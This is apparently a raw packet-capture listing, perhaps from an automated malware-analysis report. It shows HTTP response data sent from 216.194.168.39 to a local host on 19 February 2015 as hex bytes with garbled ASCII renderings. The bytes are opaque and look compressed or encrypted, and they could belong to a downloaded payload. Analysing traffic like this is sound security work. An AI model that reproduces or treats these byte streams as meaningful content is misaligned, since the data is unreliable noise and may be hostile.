Data Ascii: ^u[^mPO}g2%>#Y("gP{KS;ZB 1|*6}h0c6qV=A>qi|{*9e[e<*:/(ex"m+[;>Be6lo$4s}dj2HRr)jj)M>LcF3jpoZzy25>t
259
Feb 19, 2015 13:01:59.980683088 MEZ801032216.194.168.39192.168.1.10Data Raw: ce 64 47 6a dd 05 b9 05 4f b1 f6 5e 87 dc b4 81 63 c7 7f 4d 45 64 de ad 62 87 f7 64 ad 41 50 24 8e 0c a8 2c 23 32 44 eb b4 7a b4 9c 69 f1 ef fd 70 b5 b8 ac 1b fb 4f 9b db 03 1a b1 36 17 fc 13 c5 13 8a a8 e4 36 b4 51 5c 1a f7 af f6 76 8e ac b0 00
Data Ascii: dGjO^cMEdbdAP$,#2DzipO66Q\v]>g}2GVe<}n6a>-L-4k*t>lIh<PGG>Cnv73]uMaVrW$r:]M6{wVvM
260
Feb 19, 2015 13:01:59.980690956 MEZ801032216.194.168.39192.168.1.10Data Raw: 0a 77 f6 ac bc da d4 ad 8b 08 c9 11 38 24 ba aa 37 73 e8 9b 25 ed 32 ac 07 55 b5 17 ba 89 3b 36 3e c7 8a fc 5f 41 dc 08 d7 7b f8 32 a2 02 0c b7 20 b2 b5 eb 7f 3b 5a 3a 26 03 15 ac c8 4e 49 96 69 50 8e 92 5e a8 d3 dd 7c 92 4a a8 c7 80 8e ac 97 d4
Data Ascii: w8$7s%2U;6>_A{2 ;Z:&NIiP^|JA$>)~)!"bAo^r B?A({>Lr~*dEu:AOS.C K;IH"Wc&{u=2><8T"UH+
262
Feb 19, 2015 13:01:59.980695009 MEZ801032216.194.168.39192.168.1.10Data Raw: 3e f7 7b c4 8b 92 1c b2 bb a0 94 ff 0f 84 81 f2 a5 fa 4b ac 5c ea 2a 80 21 02 8d 30 3e 08 5d 36 8d c6 e4 60 22 e7 5d cc ba f4 21 da 0a 01 b6 ee 19 bb b0 6c bd cb 20 a4 55 05 3d f7 2e c1 95 7b b4 ee 3f c3 5a eb 79 f8 ce 5d b6 33 53 39 2f 04 e8 06
Data Ascii: >{K\*!0>]6`"]!l U=.{?Zy]3S9/g.r>M(QP<H#KLX1>]h267wG!g)>f%Kv2XU19p>r.Hts:H6|B8r>uLUw5 Ww8=YEFx0>j-
263
Feb 19, 2015 13:01:59.980899096 MEZ801032216.194.168.39192.168.1.10Data Raw: 16 5c d7 55 38 2e b8 a8 37 ee de 21 9f 84 7c ac 5f 7b 29 10 3c 63 ff 05 3e b5 e7 ef 3c 32 9c 68 87 f0 30 03 3a ad 93 b0 4e b3 b7 c1 17 21 8c 85 b3 20 33 ac 57 9c 9e 54 e0 da d4 3b 3e 6c 70 cc 43 1b cb 0a 1a e1 ff be c1 a5 b2 f5 3b 64 4e ec 3e cd
Data Ascii: \U8.7!|_{)<c><2h0:N! 3WT;>lpC;dN>>}$9Wk-\@0yr_u>SYxG<W8x?(yd;FXlgQaQv#74>>}d"lz-~65VX4)b%e;'e>bma#hJmd
263
Feb 19, 2015 13:02:00.032473087 MEZ801032216.194.168.39192.168.1.10Data Raw: ee 35 59 06 a0 de 18 18 b8 7f 5c f1 64 1c 2e 4d 19 ac 75 10 2b a4 be 63 0c 6e 3e 0b a1 87 e3 ed 77 ee 30 6d 3b 6c 2a 35 af 75 7e cb b8 48 cb 09 ef 68 46 fc fc 9c c5 d2 40 49 51 76 d1 a9 5b bb b8 6e b2 4e fa 04 51 21 9b ac a4 1b d8 fd 6b 0d d1 94
Data Ascii: 5Y\d.Mu+cn>w0m;l*5u~HhF@IQv[nNQ!k>2QLGxt)(>99#^cb>C>P*ep{-%;>uSs|3PIJ`&[s8GJx1e{>{Ak,h8$#
265
Feb 19, 2015 13:02:00.032485008 MEZ801032216.194.168.39192.168.1.10Data Raw: 36 c7 37 70 c6 d3 dd d3 8c ca 78 5d e8 c4 6a 77 b9 64 71 65 f0 a1 a9 5c ad ad 25 c0 22 bd cf 2b 79 e9 3f da e6 2b 55 ca c7 c2 22 2a b9 21 7f f5 eb 14 7f d8 ec ac 31 3c 5e f0 7f a1 fa dc 1e 71 11 50 9e cc e2 bc c5 ef b9 50 6d 49 f9 49 7a d8 c9 ac
Data Ascii: 67px]jwdqe\%"+y?+U"*!1<^qPPmIIz{qCf>f{BbU5V<#q_>B@ec>Ps)}>e?Nu<C=mz>:|;Rn;5W_Z>YEj^g9!~~N/z<Go!!
266
Feb 19, 2015 13:02:00.032645941 MEZ801032216.194.168.39192.168.1.10Data Raw: 96 ef 7f f4 29 af 59 0f bb a9 0b 11 40 de 83 6d 94 ac c4 89 dc 32 a2 27 fb 30 3d ea be 05 3b e5 0e ed eb f7 d2 ac 26 0e e9 d4 65 c3 2f b1 3e 09 f4 4b 75 8d d2 1f 5b 4c 76 b2 1c 2d b9 8f fc 38 bb d4 92 ee fc ad 8e ab 38 af 01 55 82 a8 5d 14 82 9f
Data Ascii: )Y@m2'0=;&e/>Ku[Lv-88U]"X.BjL5-&JgQZ6,\S^]&YEp&+,2>#dxTfA(mA3Mk;qT/e?, -X,]!R>D~pXAAr>;J[y+]#}*
268
Feb 19, 2015 13:02:00.036029100 MEZ801032216.194.168.39192.168.1.10Data Raw: 8c 1c d3 81 1b 63 a0 4a 42 72 4d 28 2b 7d c4 14 9c 53 eb 27 ca 24 25 2d 8c c2 3e 6f f3 bf 6c 7d 83 55 80 51 cf 4b 40 fe ca ca f7 22 bc 32 96 87 fd f1 b3 69 fd ac 7d 4c b9 d2 58 1d 32 9a 3e 47 38 1b 23 18 ed 4f 23 5a c9 55 cb ef 91 c3 5a ff bc 6e
Data Ascii: cJBrM(+}S'$%->ol}UQK@"2i}LX2>G8#O#ZUZnuJyBbZ6YE%Sj`2=n>R,S/j@~w.Ytef3qW'Yjrfd[!st>>!rZ3`E.y>>r{bW_G)
269
Feb 19, 2015 13:02:00.036039114 MEZ801032216.194.168.39192.168.1.10Data Raw: 4a 89 d0 4d eb 9c 63 01 15 2d a1 bc 24 a8 2b 6c bd 97 05 f8 0a 22 82 06 1b ac 00 b0 0f 07 d7 5b e2 3a 3e e8 eb 19 c8 69 79 1e 8a c0 cf ef 5c 03 0f 0f 7e 13 bd 26 2c fb 63 28 eb bd e1 6c 4c da 74 cd 3d 82 62 a8 e7 c3 bd 7a 9d 9c dd cf 1c 44 f5 ac
Data Ascii: JMc-$+l"[:>iy\~&,c(lLt=bzD'u>t8J/D!GaXxN_>vTv~A);pV>"Gz}1QWO>5}k%+t>1<nl),pttW$0FP>Bc
271
Feb 19, 2015 13:02:00.036042929 MEZ801032216.194.168.39192.168.1.10Data Raw: 66 6b 88 e1 14 ac e2 69 da f6 47 b8 af aa 3e a7 7b d8 a9 3f f2 8d 72 28 de 74 61 71 73 36 f9 b5 bf 5b 82 b9 c2 9f 59 07 d6 ac 30 2f 40 86 f5 1d 99 b0 3e 7d f7 ad 7f 71 9b ad 7f 31 be ed 1a 46 9b 88 3f 17 bb ad 4a 34 a9 d8 5e 11 fe d8 3f 35 0d bc
Data Ascii: fkiG>{?r(taqs6[Y0/@>}q1F?J4^?5i'|AKwk>4E|J?bQU%%qM>'pF[X|%\N}7> _G[:8c`f>5fVc]%e-Zp8a}.aE
271
Feb 19, 2015 13:02:00.036432028 MEZ801032216.194.168.39192.168.1.10Data Raw: 75 72 72 20 87 fe db ec 4d f1 39 dc 32 3b 64 ba a1 b4 83 92 a8 a1 77 7e 77 3c bf f3 e2 4f 25 a1 ee 07 51 ac a5 37 92 8e e8 a2 d0 7b 3e db a7 28 bf f6 80 44 03 bd fe c5 91 cf 5d be 87 58 bf ed 72 05 88 d7 33 49 76 ac 47 c2 56 f4 cb a0 f9 51 3a 8d
Data Ascii: urr M92;dw~w<O%Q7{>(D]Xr3IvGVQ:(Ky%BPKY>D*2G qd>:*PTT:7&`gL>S"6`lJ3y|g>KAT%LhfbfB&
273
Feb 19, 2015 13:02:00.036437988 MEZ801032216.194.168.39192.168.1.10Data Raw: 01 9b 11 3c 14 1e 22 0d bf ed 7c c2 b9 56 c1 0c 51 d8 45 f7 5a 62 0a ac 5b 02 cd b1 25 eb 7e 72 3e b4 8a a8 a0 d4 a5 c7 26 27 ea b5 cf 2b 19 fc 81 51 c1 3f 5a 0b cc 1d 23 6b 1c 6c f9 bb e3 f5 7f 1f 1e a9 e7 2b c1 10 ef 0f 31 56 a4 26 cb ac 76 48
Data Ascii: <"|VQEZb[%~r>&'+Q?Z#kl+1V&vH[1<>RW+1-N%=L7><c:r~dE00lctB6t'N >S]H2%wJWWxtrULR><.Q">'1kQ5<HGQx2
274
Feb 19, 2015 13:02:00.036586046 MEZ801032216.194.168.39192.168.1.10Data Raw: e9 ce b0 f2 05 98 83 84 1e 40 06 89 a6 64 99 be 50 81 c2 2d 72 b3 0d 3a fe 90 49 ac 4f 27 4a 7f 6d 1d dd 8d 3e bf f6 c9 ad 12 44 49 42 95 a2 fc 1e c3 c8 78 67 f7 c2 de 52 11 97 42 c8 75 b9 ac ff 16 22 ef 71 91 33 c8 36 0c ed 78 a5 89 51 73 c0 7b
Data Ascii: @dP-r:IO'Jm>DIBxgRBu"q36xQs{`pCRCBK>%n-Mv ZO>(H-U~S:ds\%$>t#E&/ f-X%Y#Rl&60v>j
275
Feb 19, 2015 13:02:00.043682098 MEZ801032216.194.168.39192.168.1.10Data Raw: 3a 0d c7 22 a6 0b 41 37 3e 2a ca 6d 56 d4 dd 9d bb 98 bc 09 6d be 46 c5 9a a9 c3 fc 5a 8e 90 8a ed 1d a2 ac a2 e2 5a 6e 0d 95 0f af 3e de a2 29 a0 64 3a 43 af a1 ee 34 a4 39 ed 27 9d 97 c3 c6 58 44 11 40 1a af 95 ac 09 de 93 f2 a9 97 13 2c 26 78
Data Ascii: :"A7>*mVmFZZn>)d:C49'XD@,&x1aZ&.>ATHnwq$AzD$e>5z]!aUd@Zun2[>R!S_[RJ2Q#~>:
276
Feb 19, 2015 13:02:00.055450916 MEZ801032216.194.168.39192.168.1.10Data Raw: 15 ac e8 93 c9 fc 97 e7 a6 fd 3e 19 a4 c7 41 44 69 2c 45 75 c0 c0 73 57 b9 93 38 2e c2 ab 3e f3 dc 80 42 c4 c8 00 e7 1a 88 b8 f7 a4 ad 0b 89 c3 c4 30 e3 77 62 19 d5 47 9b ac f7 d0 e8 11 11 3c 83 ae 3e 79 89 d9 78 63 69 4d b3 23 a4 7d fe d2 cb 3e
Data Ascii: >ADi,EusW8.>B0wbG<>yxciM#}>Aa^|H$U{j"CNkg8e">c1Z@,qqAmA>Dg<`C:D>/?Q7|~9@>`(7>VB;aH.7:)
277
Feb 19, 2015 13:02:00.055464983 MEZ801032216.194.168.39192.168.1.10Data Raw: c5 6b 06 16 33 5f 03 60 15 ac ab a7 c8 d5 a5 d8 d2 c1 be bc 5e ae 19 40 f2 db a5 a3 c5 54 56 ea 31 df 27 c8 e9 ac 7f d2 2a 9e b6 42 ab cc 3e 1f 1c 5b 4f 57 95 ee ed 8b d8 72 50 5d 83 bb 1b 81 c5 29 33 16 8f 55 00 92 e7 ae e3 0b d4 e3 42 45 02 fa
Data Ascii: k3_`^@TV1'*B>[OWrP])3UBEP]*([qIg6b^`,axKz~<0et`HKR>n66<}y^zZ>>(TXgj1yBfz]>=j%
279
Feb 19, 2015 13:02:00.055659056 MEZ801032216.194.168.39192.168.1.10Data Raw: 6d 34 6b 1d c6 0f 08 90 95 e0 65 a6 84 a0 ff ea 39 a8 c7 eb aa 80 18 41 c6 e4 3f 30 4e 93 ed 6b 11 ac 3b c6 cb 77 7f 63 8f 82 3e 4f 5d 3b 4a 2a 69 c9 33 f7 a7 c0 ca 7d ba ec bd 5e 46 c3 c8 ae b3 1f ed 64 49 a8 3f 75 c2 67 9d f7 5c 14 07 23 c6 d7
Data Ascii: m4ke9A?0Nk;wc>O];J*i3}^FdI?ug\#qdvL>>byi#i?|Fk`U A>hU;5>eA2P7jIS1h*cJ>vn&!>r8!H^)yt^_d{de
280
Feb 19, 2015 13:02:00.134943008 MEZ801032216.194.168.39192.168.1.10Data Raw: c7 6b 90 2b 06 18 61 05 12 ac 90 92 f8 5a 08 b8 fc db 26 ba 86 14 31 97 8d a8 40 2d ce ac b2 40 5a 57 8d cb 72 19 3e 57 ce c0 35 71 39 98 ca 00 04 c3 7f 7d 16 d9 ec fa c8 5d b5 0e c3 0d fb 4a 67 ac fc a8 b9 8d 67 90 da 53 3e ad fc 37 df 6e 72 c4
Data Ascii: k+aZ&1@-@ZWr>W5q9}]JggS>7nrsK2:o*w<G6,88Svpxt2>11{l@>52 W!KIf0^>y[R=&>?h*(Xl//S<
281
Feb 19, 2015 13:02:00.137120008 MEZ801032216.194.168.39192.168.1.10Data Raw: 37 e6 15 ac 5c a7 ac 05 7f a3 24 fa 3e ce 54 1d af 93 a8 fe 4a 76 e0 20 20 65 f5 93 24 67 c8 8c 7e 5c 00 64 54 22 99 ac d3 7a 29 16 fd e6 2c 3f 3e 94 dd 93 9c b9 99 86 b0 77 fd bf d6 1b de 31 3c be b9 ac 8a 3d 5f 4a ff f1 b6 a2 3e 27 e0 c5 be 81
Data Ascii: 7\$>TJv e$g~\dT"z),?>w1<=_J>'d!V)a1>KZ220>)X#1)Qe1sL7e; >CF3aW:Ad?&>S5D$DUL"=>n;
282
Feb 19, 2015 13:02:00.137140989 MEZ801032216.194.168.39192.168.1.10Data Raw: f8 40 f2 98 a4 c1 c9 f8 27 d0 f7 5e 4d 48 b5 ac 7d 17 49 1c f0 e5 0d 87 3e 88 9c 68 fb 69 c7 d3 73 e6 c4 7d 97 e4 88 5d 62 05 c9 83 25 ee a5 89 82 8a 77 b4 2e bb 24 53 3a 15 cd 25 58 bd c9 14 02 f2 a9 e1 47 39 93 ac d8 ba 8e 80 8f d3 b8 7a 3e a6
Data Ascii: @'^MH}I>his}]b%w.$S:%XG9z>6oatBx|+y!>MWV3;g{n>w*uj5%L-^Yz>c\+D'OnObfisHHiua+>p6n
284
Feb 19, 2015 13:02:00.137268066 MEZ801032216.194.168.39192.168.1.10Data Raw: 1e 51 f7 e0 26 61 d0 f7 1c b6 cb ca 17 8c b0 9a 6d 3f 87 ac 7e 2f 24 bd 21 7c a3 26 3e 5b d1 d2 02 8a 59 5f 29 54 cb cc 7e 7b 16 3e 20 17 cb db 16 d0 e2 a8 7a a5 54 ac 6b ec de ee 2e 1e c3 c6 3e d0 b3 72 0b 13 9a 50 b4 5d 49 a0 10 51 5c c7 12 8f
Data Ascii: Q&am?~/$!|&>[Y_)T~{> zTk.>rP]IQ\L%P-h|^>#yIEd1B=q\T&'y>[8m'k3aA?\/OG)O@$sv\tad>as-q]7>2>X7;Je>
284
Feb 19, 2015 13:02:00.141401052 MEZ801032216.194.168.39192.168.1.10Data Raw: 8c 8c fe a9 35 84 9f c1 df 8b 4a db 8d 59 57 20 bd 9a d6 08 cb e0 80 2e d0 96 6f 3d 81 ac 79 83 f3 8a 7e 01 c9 36 3e a3 24 d6 7f ea b8 7c 8d e0 f7 71 05 ed ea 92 0c c5 20 ac ad 8a 37 e9 23 a8 cb 7c 3e 56 9f c9 72 7b 03 eb 41 fb ad 34 71 60 10 aa
Data Ascii: 5JYW .o=y~6>$|q 7#|>Vr{A4q`|Q QN9n>!*_Ogz9:s&Rr^!F>!xn_}!Xw6*[8IOPY2P0Q>dP`bM77}>VZp+_Y
286
Feb 19, 2015 13:02:00.141419888 MEZ801032216.194.168.39192.168.1.10Data Raw: 52 55 83 2e f3 54 26 86 8c 18 21 4d d4 a9 ee 25 82 ac f7 57 c7 68 66 f0 db cc 3e 09 81 cd 2a 85 1e dd 57 4e 78 19 bb 06 75 49 24 49 cd a1 a2 5c c6 a5 ae 68 81 ac c0 be 25 da 4e ea 41 c5 5e 33 9c db 82 18 12 a8 e7 53 8d ac e9 33 e0 6e f4 ce d6 19
Data Ascii: RU.T&!M%Whf>*WNxuI$I\h%NA^3S3n>Q\)GK}-Q'>3Xoums4l>jY58cUik(\HDd1>:Ps7T.wRyTGG;^xN0qT'>*XA!
287
Feb 19, 2015 13:02:00.141422987 MEZ801032216.194.168.39192.168.1.10Data Raw: ce 7e 8c 13 a9 41 56 ce b9 ac de d1 29 e4 22 f7 8c 41 3e 4b 6b 76 ee ae 27 d4 76 b8 95 bb 8b 64 62 c5 9e d6 3d ac f3 da 9a c0 29 ae ae a6 3e 08 fd 12 25 8c 33 41 b9 c4 86 42 a5 cc 23 cd 7e b1 0c ac 6f cf 9d ce 48 be dd b0 3e d6 9e 0c 18 91 a5 76
Data Ascii: ~AV)"A>Kkv'vdb=)>%3AB#~oH>vvW@2wv;fl^v~M?-G76>@AY:GKGv>H3-e2J%W>o?RZ`>="9hXZ!;@F{=b~k
288
Feb 19, 2015 13:02:00.141774893 MEZ801032216.194.168.39192.168.1.10Data Raw: 4a 01 cf ae 6b bd cf cd 2e 22 5e ac 59 25 c1 51 5c 17 56 00 3e 7d 6b 1d 8f 72 3b c8 00 47 ac 11 f3 43 a8 b2 7f ed ce b7 35 04 9b 3b d4 1e 18 f2 3e 08 f7 ce 23 05 18 31 23 4e ee bb d6 8c b6 51 ad c7 cf c0 7f 53 4e e3 81 56 5c ac 52 fc 69 89 d8 0b
Data Ascii: Jk."^Y%Q\V>}kr;GC5;>#1#NQSNV\Ri>"W!]ElNP(]u:w2!"djA^>)xGgp'PlxOrxX>gnBUtcxLc;U`j>eli)wJ6N-jq>X
289
Feb 19, 2015 13:02:00.141782045 MEZ801032216.194.168.39192.168.1.10Data Raw: 70 88 00 d5 2c 34 a3 e2 3e e3 35 8a 1b 07 e0 b3 95 71 5c 6a 7d db f2 77 b1 d9 ea a8 3e 4b 2d 62 70 9c bf ad 6a b6 d8 30 3d 91 bd 2f 51 45 d0 5e e3 b7 28 11 ca fb 5b ac b2 c6 c0 04 cc da 02 72 3e 34 c5 e5 69 5f 66 b1 f1 bf a1 31 37 4e b9 ed 8c 79
Data Ascii: p,4>5q\j}w>K-bpj0=/QE^([r>4i_f17NyV;Hp[%T^^3H|CY1>9R<cJtZeV1j+^>~(=8AjWmp`Hu^'W'>vbom$ >E&p?
291
Feb 19, 2015 13:02:00.141902924 MEZ801032216.194.168.39192.168.1.10Data Raw: cf 30 52 da a0 7a 38 cb bc 3a 69 a0 3e 45 2a c5 4d 7e eb f4 4a 1f ae 99 65 8f 6d c9 50 18 d2 3e 04 8c 9f c9 36 08 7f ac 5d b1 a1 a3 6f 46 24 dc be 1a dc 3b bc 2f 54 e8 a5 20 d2 e7 2f 87 26 30 e2 ba fc ac 2c ee de 7a 5e 6d 96 7f 3e 4c 61 4c 7e c7
Data Ascii: 0Rz8:i>E*M~JemP>6]oF$;/T /&0,z^m>LaL~D?;~YO i8`>n6lTQ(T{hz243=\"i]@A`rM>FH1|,~xMQ"MOzMB64xj>W>)V
292
Feb 19, 2015 13:02:00.146601915 MEZ801032216.194.168.39192.168.1.10Data Raw: 22 95 87 ff 3e f0 ad 71 1a a1 0b 90 cd 27 dc 9c 56 ea 4e da f7 59 d3 1a 23 15 4d 77 a1 06 ef ac 60 3c 77 6c 39 90 e1 f9 3d 51 d7 d5 3a b4 a4 74 87 af 5c ac c3 fa a6 22 66 56 99 d0 3e 1c 43 d8 dd 78 1c ca 60 35 03 7d 91 5b 21 c9 9d be d3 46 39 2e
Data Ascii: ">q'VNY#Mw`<wl9=Q:t\"fV>Cx`5}[!F9.H_MNs0=!}h|=!62>CA`|3:}vS9:0J(g89^L>-|Q),L)%I_>1fZyO.8TFZ3"_`
293
Feb 19, 2015 13:02:00.967787027 MEZ801032216.194.168.39192.168.1.10Data Raw: cf eb 31 a4 da a9 01 2c d3 b2 bb 68 e8 58 a3 ce 49 ac b0 2d 56 97 01 f5 51 a3 3e e5 e0 89 50 4c 4c cc 7f a9 ba 38 f4 8e 49 2f 0f 9d d3 81 a8 07 b4 96 86 71 9e aa 2f 21 d7 25 3a ed b4 7b 01 d5 d3 11 23 b3 ec f1 e5 ae bf ac 89 a9 85 18 fa eb 34 a1
Data Ascii: 1,hXI-VQ>PLL8I/q/!%:{#4>?1 PyaH<Qb%bjsE|,]tHHn">z^>.^ojSsqFw>]g<OS;)>n1>"!w52.JWN:B:
294
Feb 19, 2015 13:02:00.967808962 MEZ801032216.194.168.39192.168.1.10Data Raw: 93 7c 12 0e a1 44 2f a7 ec 6c 6e 87 d5 4e a8 78 4a ca b5 58 26 bc ce 65 4b b1 05 1e 0a 6c 73 15 95 50 39 e6 5c 3d d2 e9 d5 53 ae 89 5a 4a 16 c6 9b ac 17 62 3c cc ba d3 d7 bc 7e 7e 5e c2 4b cc 6b 77 39 38 d5 37 2c 4f 09 c9 75 82 e1 ac 5e 60 a9 31
Data Ascii: |D/lnNxJX&eKlsP9\=SZJb<~~^Kkw987,Ou^`1Ws>!_\m%({SUA[4>5zqq.vdjCA@p,=05f}!7Y^zjnXPX(>qRZZa10o)H<b#>^$)E;,4'?
296
Feb 19, 2015 13:02:00.967811108 MEZ801032216.194.168.39192.168.1.10Data Raw: 92 55 6f 38 d6 b7 7b 8e 37 ea 72 55 9b ac d9 20 fe 5e b4 4a ca c3 fe 2a f4 8d e0 b3 8d e3 3a cb d2 ac 58 c0 d2 35 7e c9 50 26 3e 78 10 83 88 ff 4b 66 ab 87 97 40 57 cc 4b 53 3a da d6 b1 e9 c5 5d c8 42 73 07 a0 55 b5 29 af c7 8e 8a a3 6a e5 d6 81
Data Ascii: Uo8{7rU ^J*:X5~P&>xKf@WKS:]BsU)j58A>|kiZiUx778H>]06;>ud\d|+Ln>bo5.|K;n-28>~Ha1%
297
Feb 19, 2015 13:02:00.967932940 MEZ801032216.194.168.39192.168.1.10Data Raw: 9b ac 50 9a 9b ac a4 8a be 74 3e 95 b6 e4 90 fc 57 63 c2 89 66 5a 53 44 6b 9e 7f 12 d7 55 69 79 c2 68 0a 80 dc ac 61 15 b5 43 85 9c bd b8 1e 9d 47 6d 1a 38 0c b9 55 a5 d7 a9 1b 20 ca ea 74 b6 b8 ac d6 a2 b6 a2 c7 13 f5 e1 3e f5 2d 5c 4f 5d e5 81
Data Ascii: Pt>WcfZSDkUiyhaCGm8U t>-\O]Of}:+P!9Pkh6pA`7n|#x_>$hw.&pz>_J{!].C WNHccR_K"-Q>ES<Gi7,hv\"jA'.g
298
Feb 19, 2015 13:02:00.967936993 MEZ801032216.194.168.39192.168.1.10Data Raw: 71 ef 59 39 d8 af 70 1b c0 f5 68 f0 35 ac 3c d2 4c ca 6c bb 4f df 3e 9b bc bc 52 6c 1f db a9 f9 91 c9 83 6b fb f1 2c 73 d8 f9 56 75 d0 23 22 b6 b6 ac 0c 69 6e 64 23 bc ed 44 3e de 0b 0e 9f 4b be cd ab 62 f3 84 4d a1 05 43 3b 9e fb d6 3e 5a fc ae
Data Ascii: qY9ph5<LlO>Rlk,sVu#"ind#D>KbMC;>Z|\XQNSMf$b>{c%SQ;P~"PQ{{wi(e;U*o->;> dL)ZLO!r6dA3:S ?&zMi9y<A/=g
300
Feb 19, 2015 13:02:00.968151093 MEZ801032216.194.168.39192.168.1.10Data Raw: f5 46 7e 45 9a 71 d5 30 9e b7 21 f8 da 1a cb 71 c7 1b 30 62 bc ac a3 63 a5 57 1f 78 46 88 3e 71 fc f6 d3 1f f5 93 89 68 8f 90 dc ff 4e 97 0a 22 da 31 6e 1d fb df c6 2e 51 ec c4 df 2c ab 5c db c1 8a e1 6f ed 9c e3 13 52 c4 c9 18 da ed 03 e7 98 dd
Data Ascii: F~Eq0!q0bcWxF>qhN"1n.Q,\oR]FPo>)x!jx;E9>D:QEq|[*xX'>}0=,x!@~7-Sy>MsuFQc3?ML3s%G<{
301
Feb 19, 2015 13:02:00.968172073 MEZ801032216.194.168.39192.168.1.10Data Raw: 5e 4c a9 bc db b1 5b 52 fd 09 77 86 4a ac 47 8a 94 8f 9d 71 3d 1d 3e af c5 b0 91 ff 85 89 b7 74 8a e5 85 78 fd 16 b2 74 92 ac f1 c1 29 e3 55 7f 77 e0 3e 56 f2 48 c2 75 8f 4e 7f 77 4d 1b ca 07 88 cb 20 40 db ab a1 3e 33 ea bb 3a b4 ac c2 00 95 47
Data Ascii: ^L[RwJGq=>txt)Uw>VHuNwM @>3:G#>O9hpK[A_yM"~U9Tq>X2f,d[G?J"Nn[[='v4kL&wA$,%J&>_^tP`+;M^7
302
Feb 19, 2015 13:02:00.968175888 MEZ801032216.194.168.39192.168.1.10Data Raw: fa 65 fe 00 3f ac 5e 27 37 b3 3a c2 d8 ac 6a b9 cc 1d 60 97 4c db 3e c0 d2 5b a9 43 99 2c bb dd 90 6e 2b de 8d 06 d9 bd dc 7e 94 39 37 5d 72 86 36 9c 49 11 ec c8 11 2c 97 a4 64 f7 dc 09 c4 20 ec f4 2a f3 e3 ac 5c eb 1f ed a8 35 03 37 3e bd f0 66
Data Ascii: e?^'7:j`L>[C,n+~97]r6I,d *\57>fvkY@P^4I: \=NBJSH>%.q-!KE/N|>)T9?"]#?|>}~l2taF{9>
304
Feb 19, 2015 13:02:00.968179941 MEZ801032216.194.168.39192.168.1.10Data Raw: de 49 ec d9 0b 48 31 16 c8 ac 1a 4d dd 47 18 6c 15 0a 3e 86 94 87 06 c2 e1 d1 01 4b 9c 37 36 08 a2 8d 99 5c b3 ac 0b 52 eb 7e 99 4c 10 37 3e df c4 b5 bf db a9 ef 01 50 f7 c2 a9 d3 46 6f 7d 70 de 2c a6 01 ff ce f6 17 01 ac 76 db d1 94 c2 67 d3 37
Data Ascii: IH1MGl>K76\R~L7>PFo}p,vg7>=]JTYFd#y{D>JuN1`{Hult"<PD>!7C0i+|Gg{^>\-pM]dtg><dOy+W5GM|@v^)U
305
Feb 19, 2015 13:02:00.968182087 MEZ801032216.194.168.39192.168.1.10Data Raw: 57 67 3e 90 3c dc ac e9 53 77 7f b2 dc 05 75 51 e8 e3 86 a0 df 80 30 10 b8 95 99 9d 12 ac fe 45 dc 93 9a 1d 8b ed 3e dc 1d 37 5e fb 78 a0 12 bd 37 c3 38 d5 d9 5c f3 f0 3b e3 3e 43 ab 59 52 56 c2 05 57 c0 fa a9 49 9c 10 89 95 24 bf 9e 1e 96 54 9e
Data Ascii: Wg><SwuQ0E>7^x78\;>CYRVWI$TA60@<k>3&>,+J980`.;!%`}O3"Z>Gg>eZp*Ul"Y!V$:B}-=7
307
Feb 19, 2015 13:02:00.968218088 MEZ801032216.194.168.39192.168.1.10Data Raw: 0e d7 0a d7 a1 ac 71 e3 f8 fd a4 fc dd 10 3e c6 7a de 18 4b b5 d5 25 22 88 b8 b2 df ae c8 72 c9 a1 83 a4 db f8 8f 55 bd ed c3 3e 45 a3 a4 40 1c a2 92 ad 29 09 d8 8e 30 75 60 fa 60 e1 84 27 94 d7 ed 7c 49 66 ac a9 e2 85 4f 68 14 2e da 36 71 a0 29
Data Ascii: q>zK%"rU>E@)0u``'|IfOh.6q)9@+K\CP>r^95}|(|rCPB@q;f>X4EBL:s:z2>1R>tINk6;|UuGaP1QmG`mE)z>.~[lo
308
Feb 19, 2015 13:02:00.968346119 MEZ801032216.194.168.39192.168.1.10Data Raw: 61 c4 14 95 e6 ad 27 8f ba 50 71 8b 1e 24 7f 8d a0 70 8f b7 a2 15 3e ee e2 a6 bd 28 61 70 7f 7c b8 ac 24 27 a3 2e 50 af f9 25 3e cb 57 43 d3 78 8c 1a 57 96 c8 89 ef 07 54 3b 2a 49 e2 ee 81 9f b4 b0 7c fa 95 6c 70 0f 2b 0e ee 60 1d 19 55 04 e2 34
Data Ascii: a'Pq$p>(ap|$'.P%>WCxWT;*I|lp+`U49IP2>giV<I9?,aE;|0>D;iR>z%{1o_~*$R23:#PWn/>X?7G?%l;>\
309
Feb 19, 2015 13:02:00.968413115 MEZ801032216.194.168.39192.168.1.10Data Raw: 2d ac 57 52 72 02 26 a8 c3 8d 3e 64 b8 38 27 2d dc 49 d6 35 63 f6 58 f6 a2 cd 3f 96 e3 c1 0c 7d f1 79 0d 53 70 ac 8f e4 3f 50 4b 58 52 f7 3e 65 bc c4 36 e7 a2 c8 bf 1e 27 b5 2e 04 a0 b7 6a 7d 5f ac 22 29 11 41 f9 40 8a 5e 3e a6 68 ba e2 83 e5 a6
Data Ascii: -WRr&>d8'-I5cX?}ySp?PKXR>e6'.j}_")A@^>h%E4m_E_i}LKZ0R>o+6R>kNU6U]r}Dv4:Uqmwq\<;&,=C>%A{F>#;eWY6X1&J.a(sw
311
Feb 19, 2015 13:02:00.968417883 MEZ801032216.194.168.39192.168.1.10Data Raw: b7 29 3b 5f 13 ec 3e d8 e0 33 fc c0 73 ff 3d a2 3b a9 e7 a7 c7 5d f4 7d 27 5c 3e ec eb 6a 53 11 a4 79 cc a6 ab 5f 22 9b cd b2 c2 e8 e4 c7 07 a9 86 2d 0b eb b5 6c 44 f6 86 21 7d 35 fb a8 27 a9 e4 a0 d3 b9 9a 09 01 ed 55 ac 58 2e a5 23 f3 ec c7 27
Data Ascii: );_>3s=;]}'\>jSy_"-lD!}5'UX.#'>z_/IADL'K/K2c )3>EkhM")6QcS{][>PJ)I} d$t<WO{Sd>*yT
312
Feb 19, 2015 13:02:00.968524933 MEZ801032216.194.168.39192.168.1.10Data Raw: a6 99 41 0b 89 b1 c3 1b 9b 19 b8 a9 e0 bb 51 0b 6c 00 43 3e 52 4d 64 10 f6 91 2b 0d fa e4 7d 5d e6 97 7a 25 7b 8b c1 af e6 01 66 35 42 c6 e5 f7 f4 ac fb 3a 65 ee 6f 27 1b f9 3e cc b4 60 7c 78 6d 87 48 1b b0 04 32 5a 7e 7d 77 e6 e6 ea 53 a1 f3 3b
